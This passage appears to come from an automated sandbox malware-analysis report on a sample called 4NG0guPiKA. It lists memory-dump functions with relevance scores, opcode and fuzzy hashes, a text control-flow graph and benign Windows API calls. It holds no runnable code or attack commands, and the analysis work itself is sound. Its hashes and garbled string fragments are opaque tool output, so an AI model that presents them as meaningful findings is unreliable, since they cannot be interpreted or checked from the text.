                                                                                                            • Instruction Fuzzy Hash: 55B1AB307047508FEB259F34C858B7E7BE2AB89341F14856AE846CB7A5DB78CC41DBA1
                                                                                                            Function 000D5460 Relevance: 2.7, Strings: 2, Instructions: 228COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2568 d5460-d546d 2569 d546f-d5473 2568->2569 2570 d5475-d5477 2568->2570 2569->2570 2571 d547c-d5487 2569->2571 2572 d5688-d568f 2570->2572 2573 d548d-d5494 2571->2573 2574 d5690 2571->2574 2575 d5629-d562f 2573->2575 2576 d549a-d54a9 2573->2576 2578 d5695-d56cd 2574->2578 2579 d5635-d5639 2575->2579 2580 d5631-d5633 2575->2580 2577 d54af-d54be 2576->2577 2576->2578 2586 d54c0-d54c3 2577->2586 2587 d54d3-d54d6 2577->2587 2598 d56cf-d56d4 2578->2598 2599 d56d6-d56da 2578->2599 2581 d563b-d5641 2579->2581 2582 d5686 2579->2582 2580->2572 2581->2574 2584 d5643-d5646 2581->2584 2582->2572 2584->2574 2588 d5648-d565d 2584->2588 2589 d54c5-d54c8 2586->2589 2590 d54e2-d54e8 2586->2590 2587->2590 2591 d54d8-d54db 2587->2591 2607 d565f-d5665 2588->2607 2608 d5681-d5684 2588->2608 2593 d54ce 2589->2593 2594 d55c9-d55cf 2589->2594 2600 d54ea-d54f0 2590->2600 2601 d5500-d551d 2590->2601 2595 d54dd 2591->2595 2596 d552e-d5534 2591->2596 2604 d55f4-d5601 2593->2604 2602 d55e7-d55f1 2594->2602 2603 d55d1-d55d7 2594->2603 2595->2604 2605 d554c-d555e 2596->2605 2606 d5536-d553c 2596->2606 2609 d56e0-d56e2 2598->2609 2599->2609 2610 d54f4-d54fe 2600->2610 2611 d54f2 2600->2611 2641 d5526-d5529 2601->2641 2602->2604 2614 d55d9 2603->2614 2615 d55db-d55e5 2603->2615 2633 d5615-d5617 2604->2633 2634 d5603-d5607 2604->2634 2627 d556e-d5591 2605->2627 2628 d5560-d556c 2605->2628 2617 d553e 2606->2617 2618 d5540-d554a 2606->2618 2619 d5677-d567a 2607->2619 2620 d5667-d5675 2607->2620 2608->2572 2612 d56e4-d56f6 2609->2612 2613 d56f7-d56fe 2609->2613 2610->2601 2611->2601 2614->2602 2615->2602 2617->2605 2618->2605 2619->2574 2622 d567c-d567f 2619->2622 2620->2574 2620->2619 2622->2607 2622->2608 2627->2574 2645 d5597-d559a 2627->2645 2642 d55b9-d55c7 2628->2642 2636 d561b-d561e 2633->2636 2634->2633 2635 d5609-d560d 2634->2635 2635->2574 2637 d5613 2635->2637 2636->2574 2638 d5620-d5623 2636->2638 2637->2636 2638->2575 2638->2576 2641->2604 2642->2604 2645->2574 2646 d55a0-d55b2 2645->2646 2646->2642
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,q$,q
                                                                                                            • API String ID: 0-1667412543
                                                                                                            • Opcode ID: bbaa9313df0f7767c21b5b5a075dc9105793c08252369433ac8521215785e78f
                                                                                                            • Instruction ID: 0d1039bcc519ec0e85d5bc8c1541be165d02839dd8b37a815a0caf6a78bad45e
                                                                                                            • Opcode Fuzzy Hash: bbaa9313df0f7767c21b5b5a075dc9105793c08252369433ac8521215785e78f
                                                                                                            • Instruction Fuzzy Hash: 12818134A00A058FCB54CF69CC949AEB7F2BF88316B65816AD805DB365DB31EC41CFA1
                                                                                                            Function 000D0B29 Relevance: 2.7, Strings: 2, Instructions: 203COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LRq$\'!3
                                                                                                            • API String ID: 0-3664120778
                                                                                                            • Opcode ID: 7e468d4d085456e38d63350e1431a35dc805197285090b2d175c14adb0cba39c
                                                                                                            • Instruction ID: 8d7fdc1a21068386171b72758b14953eb2e3f89c175fa59b3955b55fe33a5612
                                                                                                            • Opcode Fuzzy Hash: 7e468d4d085456e38d63350e1431a35dc805197285090b2d175c14adb0cba39c
                                                                                                            • Instruction Fuzzy Hash: 9BA1A974A00349DFDB04DFA8D888A9DBBB2FB4C701B108229E405BB365DB74A946CF95
                                                                                                            Function 000D0B30 Relevance: 2.7, Strings: 2, Instructions: 200COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LRq$\'!3
                                                                                                            • API String ID: 0-3664120778
                                                                                                            • Opcode ID: 09407aab73a7875f37fa18dd9fb3970bdbbcc4be04b07735869359e3caed0b2e
                                                                                                            • Instruction ID: af7c4dfa7a253d99494d7bc921f9dd2c5a1ef5b876ba2df10118e170db25596e
                                                                                                            • Opcode Fuzzy Hash: 09407aab73a7875f37fa18dd9fb3970bdbbcc4be04b07735869359e3caed0b2e
                                                                                                            • Instruction Fuzzy Hash: 6AA1A874A00349DFDB04DFA8D888A9DBBB2FB4C701B108225E405B7365DB74A946CF95
                                                                                                            Function 000D8BF0 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q
                                                                                                            • API String ID: 0-1467158625
                                                                                                            • Opcode ID: eb54a8cd55b79c2e232bc1e6e1bcfb13f9eeea10c46632b69c4a1ef05a69abd9
                                                                                                            • Instruction ID: 5d6bfc505c8777da8cba2636433ef25021f6a5fb03a01adec67710736089b405
                                                                                                            • Opcode Fuzzy Hash: eb54a8cd55b79c2e232bc1e6e1bcfb13f9eeea10c46632b69c4a1ef05a69abd9
                                                                                                            • Instruction Fuzzy Hash: 6B518C307153449FEB00DB69C840BAA7BE6EF89350F14C466E905CB3A2DB75DD01DB61
                                                                                                            Function 36450104 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36450222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: b3bb385c4e718122bed5da4cc7b7c166df7a728917b4ee79448b1b0dd5427694
                                                                                                            • Instruction ID: aea5bb54ea070f52b6229d9af6030cc10c3427e97f514f0c8dffd1c743b821cd
                                                                                                            • Opcode Fuzzy Hash: b3bb385c4e718122bed5da4cc7b7c166df7a728917b4ee79448b1b0dd5427694
                                                                                                            • Instruction Fuzzy Hash: AE51D0B5D10348DFDB15CFA9C880ADEBFB1BF48310F20812AE818AB210D775A841CF91
                                                                                                            Function 36450110 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 36450222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: fc93182e728d09b9357ae48166410ffa1d45bf3a827faa9d6ed9119640448716
                                                                                                            • Instruction ID: c829028aa9015e0e24c5ed14d1cda37913f8acdbfa79881ea5ac76a1b236bcb3
                                                                                                            • Opcode Fuzzy Hash: fc93182e728d09b9357ae48166410ffa1d45bf3a827faa9d6ed9119640448716
                                                                                                            • Instruction Fuzzy Hash: 7241C0B5D10349DFDB15CF9AC880ADEBBB5BF48710F24812AE918AB210D775A841CF91
                                                                                                            Function 36451854 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 36451E81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 9ad1ee46657704e258dc65480488327664f631dca77688128e56995393dd8ffa
                                                                                                            • Instruction ID: 11421b41ee00a3f6740b4c9b56c5893acfe23c748959258700d4be3764525268
                                                                                                            • Opcode Fuzzy Hash: 9ad1ee46657704e258dc65480488327664f631dca77688128e56995393dd8ffa
                                                                                                            • Instruction Fuzzy Hash: C34117B8D00349CFDB14CF95C484A9ABBF5FF89314F25C959D619AB321C774A841CBA0
                                                                                                            Function 36450BC1 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36450C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: eb3970b707ed5794b2cf6e3eb315de7e9377d45eb9ff5884da6100d7694b417a
                                                                                                            • Instruction ID: dcbc893b2369b3b189f5ceed00dbd4bb88dcc791f3ca6cfe7ed954e6e20b1984
                                                                                                            • Opcode Fuzzy Hash: eb3970b707ed5794b2cf6e3eb315de7e9377d45eb9ff5884da6100d7694b417a
                                                                                                            • Instruction Fuzzy Hash: 9F21E5B5D002489FDB10CFAAD984ADEBBF4EB48310F14841AE954A7310D374A940CFA5
                                                                                                            Function 36450BC8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36450C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 14ee5ea1ae4f648bc11d301416a6d5f621e31130c78e9b30f25e4d15a89a05d3
                                                                                                            • Instruction ID: d75b533766d38dd4dab91864ad5eb0e2f139c2f45654be8866f5830c09dd63e0
                                                                                                            • Opcode Fuzzy Hash: 14ee5ea1ae4f648bc11d301416a6d5f621e31130c78e9b30f25e4d15a89a05d3
                                                                                                            • Instruction Fuzzy Hash: 6121C4B5D003489FDB11CFAAD984ADEBBF4EB49320F14841AE958A7310D374A940CF65
                                                                                                            Function 36452019 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: dfd5e2d65172cfa0b8abd9639376b0e19d0d26e05c547c4d4c24c24a2cd132c3
                                                                                                            • Instruction ID: 3672f067ab4a8dc7e983ea6fed18b2beff9b1fc7fdffe225dda0d8c0483776c6
                                                                                                            • Opcode Fuzzy Hash: dfd5e2d65172cfa0b8abd9639376b0e19d0d26e05c547c4d4c24c24a2cd132c3
                                                                                                            • Instruction Fuzzy Hash: E911F5B5800349DFDB20CF9AC485BDEBBF4EB49720F10841AD959A7210C375A984CFA5
                                                                                                            Function 3645C618 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 3645D525
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: bfab207aafaadb49436bc50850c7aa667a51f2589076390c631106d3fb34b67c
                                                                                                            • Instruction ID: 79816f9beb9bc781d2689cc713ccae284691cb8022595f82f4aabc3d1f99a871
                                                                                                            • Opcode Fuzzy Hash: bfab207aafaadb49436bc50850c7aa667a51f2589076390c631106d3fb34b67c
                                                                                                            • Instruction Fuzzy Hash: E61133B1D04348CFDB20CFAAD545B9EBBF4EF48224F108459D618A7200C374A940CFA9
                                                                                                            Function 3645C6C4 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3645DA0F), ref: 3645E845
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: b7152ba40189206da87a5aa82d64339031b1229d86da03e2eaf83456bfcf23c2
                                                                                                            • Instruction ID: 29abea8dc5a7e4d29753c8f7d6785427dc7b22b5509dfe84d8c3d3d7fa551d06
                                                                                                            • Opcode Fuzzy Hash: b7152ba40189206da87a5aa82d64339031b1229d86da03e2eaf83456bfcf23c2
                                                                                                            • Instruction Fuzzy Hash: A71110B1C04748CFDB20CF9AD444B9EFBF4EB48324F10842AE518A7210C378A540CFA5
                                                                                                            Function 3645D4C8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 3645D525
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: f9c79d82aede8ea40f308a5d92261ccfec64de9bcc19afa84aea1fca7e1af6ca
                                                                                                            • Instruction ID: 7d107dcd55c27a7766dbfe761516f2cb2dd1e3d7c5f695ec59f13fa20301c7b6
                                                                                                            • Opcode Fuzzy Hash: f9c79d82aede8ea40f308a5d92261ccfec64de9bcc19afa84aea1fca7e1af6ca
                                                                                                            • Instruction Fuzzy Hash: 7A1103B5D003488FDB20CFAAD545BDEBBF4EB48224F20845AD559A7210C378A944CFA5
                                                                                                            Function 36452020 Relevance: 1.5, APIs: 1, Instructions: 44timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: 408ad6d1583cb8ae5e509aeb748905d2e0f652801a8dbce8a9c99988ea6177ac
                                                                                                            • Instruction ID: f1437b8d7b0cdce6271f469e015ea77335aac4e8a1614b23a8e42a2bac9bfbaf
                                                                                                            • Opcode Fuzzy Hash: 408ad6d1583cb8ae5e509aeb748905d2e0f652801a8dbce8a9c99988ea6177ac
                                                                                                            • Instruction Fuzzy Hash: 0C11D3B5800349DFDB20CF9AD845BDEBBF8EB49720F10841ADA59A7210C375A984CFA5
                                                                                                            Function 3645E7E0 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3645DA0F), ref: 3645E845
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: 3d928fd643980c6ee2d26ac3314676c5c9a94f6ce8b5dd5b6152f9cb973fe5b5
                                                                                                            • Instruction ID: b8fa05bbb78a7ddc563a53d97674f254b624f8732a1b73c9cbf5bc50679900da
                                                                                                            • Opcode Fuzzy Hash: 3d928fd643980c6ee2d26ac3314676c5c9a94f6ce8b5dd5b6152f9cb973fe5b5
                                                                                                            • Instruction Fuzzy Hash: F5111DB5C00289CFCB20CFAAD540BDEFBF4AB08224F10851AD568A7210C338A541CFA6
                                                                                                            Function 000D9EB0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq
                                                                                                            • API String ID: 0-1999159160
                                                                                                            • Opcode ID: 6c441c15472dbbcb48430ec904e58071101650470daea0b264ce6d5fb9c8f3ea
                                                                                                            • Instruction ID: 50cc763c43ae2042e097c6836a7e8f7db88b17354224ec648d161d9623c83c86
                                                                                                            • Opcode Fuzzy Hash: 6c441c15472dbbcb48430ec904e58071101650470daea0b264ce6d5fb9c8f3ea
                                                                                                            • Instruction Fuzzy Hash: 2A41D032B042049FDB15AB75D815AEE7BF6AFCD310F18406AE906D77A1DE359C01CBA1
                                                                                                            Function 000D4620 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            • 8K$3DK$3PK$3\K$3hK$3K$3, xrefs: 000D4640
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8K$3DK$3PK$3\K$3hK$3K$3
                                                                                                            • API String ID: 0-743523151
                                                                                                            • Opcode ID: dda28354ecfdf93c84966a9af51bc74f3daec11d96f6ae6266dc2112587b5613
                                                                                                            • Instruction ID: 8aea1dc3ab440fc8c00ab3311007f8f2455cf81b728708d6e489dee316fbe0d8
                                                                                                            • Opcode Fuzzy Hash: dda28354ecfdf93c84966a9af51bc74f3daec11d96f6ae6266dc2112587b5613
                                                                                                            • Instruction Fuzzy Hash: AB31B431304209AFCF059F64D854ABE3BA2EB89300F148025F9169B765CF39DE21EFA1
                                                                                                            Function 000D8729 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: X\$30a$3
                                                                                                            • API String ID: 0-2318330025
                                                                                                            • Opcode ID: a43599221e7832d9fd0d90ecf7b68502092ff1e3892116cb150a146419f2cda0
                                                                                                            • Instruction ID: 299d90345ce159f39592126fe452fe4982b8633bf580a8b2d1b3d18d03e3fd53
                                                                                                            • Opcode Fuzzy Hash: a43599221e7832d9fd0d90ecf7b68502092ff1e3892116cb150a146419f2cda0
                                                                                                            • Instruction Fuzzy Hash: 52216930A0524C9FDB15CFA5D940AEEBFB6EF48305F24806AE415B63A0DB34E941EF60
                                                                                                            Function 000D4664 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PK$3\K$3hK$3K$3
                                                                                                            • API String ID: 0-704815058
                                                                                                            • Opcode ID: d633742fe4de6bd18ed9d8de61d2a9d43f5dc13bacabe98b1f3fd845aeafccb5
                                                                                                            • Instruction ID: a00286ac28244a4288c3b4820d1159293fb1dea03ada232e571fa5d82984e76a
                                                                                                            • Opcode Fuzzy Hash: d633742fe4de6bd18ed9d8de61d2a9d43f5dc13bacabe98b1f3fd845aeafccb5
                                                                                                            • Instruction Fuzzy Hash: F601D436304204AFCB055F64D8545BD7BA2EF49300714803AF9068A765DB39CE12EFA1
                                                                                                            Function 35F2C175 Relevance: .3, Instructions: 322COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b8a661b28f599d1c5d5b19fc6fc478e17a2d4509d41d9e376e82b72177d4858f
                                                                                                            • Instruction ID: 750861d1c751cbd7af0d29e25819f6b0c150e34e07c5df671078d55a0a1a4fe4
                                                                                                            • Opcode Fuzzy Hash: b8a661b28f599d1c5d5b19fc6fc478e17a2d4509d41d9e376e82b72177d4858f
                                                                                                            • Instruction Fuzzy Hash: 6DE1E674A00258DFEB25DF64C858BADBBB6FB89300F1085A9D80A77350CB759E82DF54
                                                                                                            Function 35F2C173 Relevance: .3, Instructions: 319COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aaf79e34dbf2fd7867b78a78562ff96af26dd4d8cebae36cfbbc5ef0e3b9738f
                                                                                                            • Instruction ID: ee72e9661d4203b3694b33587a7afd39743409179e5fe9eb5f4f4b2e5d1d102a
                                                                                                            • Opcode Fuzzy Hash: aaf79e34dbf2fd7867b78a78562ff96af26dd4d8cebae36cfbbc5ef0e3b9738f
                                                                                                            • Instruction Fuzzy Hash: 00E1E774A00258DFDB25DF64C858BADBBB6FB89300F1085A9D80A77350CB759E82DF54
                                                                                                            Function 000D6C98 Relevance: .2, Instructions: 201COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5486aeef6f3952681dff0759a7f415c777abe35f982f9f991852fdef13d2d38a
                                                                                                            • Instruction ID: 8f5bb5762c6cd20529b03a4fc0d0f1a1fddd10f6474d764f82261d9dd7475d26
                                                                                                            • Opcode Fuzzy Hash: 5486aeef6f3952681dff0759a7f415c777abe35f982f9f991852fdef13d2d38a
                                                                                                            • Instruction Fuzzy Hash: B77119347003058FDB54DF28C894A6E7BE6AF59700F1944A6E806CB3B1DB76EC41DBA1
                                                                                                            Function 35F2FAB8 Relevance: .2, Instructions: 189COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 13e324357b0d46e25ac424064b03d7073309cbbc2fa10bc368400e9d05906fd8
                                                                                                            • Instruction ID: 0de277c633bcbb08e8394e6884366959fe9805124a034b6c2085037171028f7d
                                                                                                            • Opcode Fuzzy Hash: 13e324357b0d46e25ac424064b03d7073309cbbc2fa10bc368400e9d05906fd8
                                                                                                            • Instruction Fuzzy Hash: AA71FA75E003198FDB09EFB5C858AADBBF2FF88700F108629D406AB254DB799952CF51
                                                                                                            Function 35F27920 Relevance: .1, Instructions: 147COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 43581e5844dc3d2551402150a0ed80f1b8f741209951ddcfc7e6f42500b58e67
                                                                                                            • Instruction ID: 01c9a6489139d5b42c502ed11617532566b908d060ab0b22aa07bf34beec2fe6
                                                                                                            • Opcode Fuzzy Hash: 43581e5844dc3d2551402150a0ed80f1b8f741209951ddcfc7e6f42500b58e67
                                                                                                            • Instruction Fuzzy Hash: 4551AE74D01318DFDB14DFA5C854BAEBBB2BB88300F608629D805BB255DB759986CF50
                                                                                                            Function 35F2CC28 Relevance: .1, Instructions: 144COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
